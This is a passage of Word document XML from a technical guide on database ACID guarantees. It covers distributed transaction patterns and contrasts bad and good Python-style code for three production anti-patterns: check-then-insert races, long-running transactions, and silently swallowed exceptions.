        <w:t xml:space="preserve">    Primary key: one key acts as coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB958C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    All other keys: secondary (reference primary for commit status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789506A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C487A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use case: MySQL compatibility + horizontal scale + ACID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E518B5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="60F1ADEB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Common patterns in distributed ACID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA0C3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Consensus replication (Raft/Paxos) for each shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3F093" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  2PC for cross-shard transactions (unavoidable for atomicity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5119A2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Distributed timestamps for consistent snapshots (TrueTime, HLC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E513AB5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  SSI or 2PL for serializable isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D463076" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDD856" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  All accept: higher latency than single-node (coordination cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621414C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  All provide: horizontal write scalability + ACID guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2C338" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="1DB48219">
          <v:rect id="_x0000_i6776" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498278A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Practical ACID — What Breaks It in Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31BE10" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common ACID Violations in Application Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5538FD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F781F31" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Anti-pattern 1: Checking then acting without a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E51A078" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="4C861D98" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A2FC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Application code (not in transaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76C94A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  user = db.query("SELECT * FROM users WHERE email = %s", [email])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51151557" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  if user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E09561" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      raise EmailAlreadyExists()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF7DDC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # GAP: another request can insert same email here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C2FAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  db.execute("INSERT INTO users (email) VALUES (%s)", [email])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5DAFA8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E286F2A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Two concurrent requests with same email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D5B66" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Both check: no user found → both proceed to insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE83A4A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Both insert: database unique constraint saves us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410E160" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    But: one gets error, one succeeds → race condition that the constraint fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A31E6D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD333C8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>GOOD (database-level uniqueness handles it):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437666FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3059979B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      db.execute("INSERT INTO users (email) VALUES (%s)", [email])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819E8C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      db.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15040179" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  except UniqueViolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B93714" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      raise EmailAlreadyExists()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82D5FA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57BE3F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The database constraint is the atomic check-and-insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A5C57" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  No need for application-level check (it's redundant and racy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28254D33" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3A0F5DF7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Anti-pattern 2: Long-running transactions in application layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94AEA9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="34FD72BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A27CBD8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C42217" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      orders = db.query("SELECT * FROM orders WHERE status = 'pending'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CB9AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      # 10,000 orders returned, transaction holds row locks or snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BFC36" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24177FDB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      for order in orders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490BF0A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          # Each call takes 100ms (external service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDAB3D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          shipping_label = shipping_service.create_label(order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F1D60" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          db.execute("UPDATE orders SET label = %s WHERE id = %s", ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036BA07" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B6355" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Transaction held for 100ms × 10,000 = 1,000 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E5D9E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # During this time: row locks held, MVCC old versions accumulate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A308A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F51C89" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>GOOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44549E05" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Process in small batches, commit each batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EEF05" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  offset = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72647E69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14527C0E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DECF1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          orders = db.query(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327BAD0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              "SELECT * FROM orders WHERE status = 'pending' LIMIT 100 OFFSET %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26366833" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              [offset]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10482D92" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08F7A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          if not orders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10C12B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF54C2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF34A8E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          for order in orders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FE648" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              shipping_label = shipping_service.create_label(order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B21C15" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              db.execute("UPDATE orders SET label = %s WHERE id = %s", ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EC0B23" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22741412" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          offset += 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32CA4F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      # COMMIT every 100 orders — transaction held for ~10 seconds, not 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69881562" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="24A944E4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Anti-pattern 3: Silently swallowing exceptions (hiding aborts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4B513" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="71634FFF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BAD (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00EF63" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC6548" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F65D76" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          do_something_critical()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716C5DB1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655349BB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      pass  # Transaction aborted, but we pretend it succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474083A5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11071C53" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Caller believes operation succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D64549" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Data was not persisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CF702" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  # Silent data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0CDA5F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="672255C3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>GOOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40FF5F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779197B4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2775DD70" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          do_something_critical()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCCDB4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  except DatabaseError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C5F30" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      log.error("Transaction failed", error=e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C8462" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      raise OperationFailedError(f"Could not complete operation: {e}") from e</w:t>
      </w:r>
    </w:p>
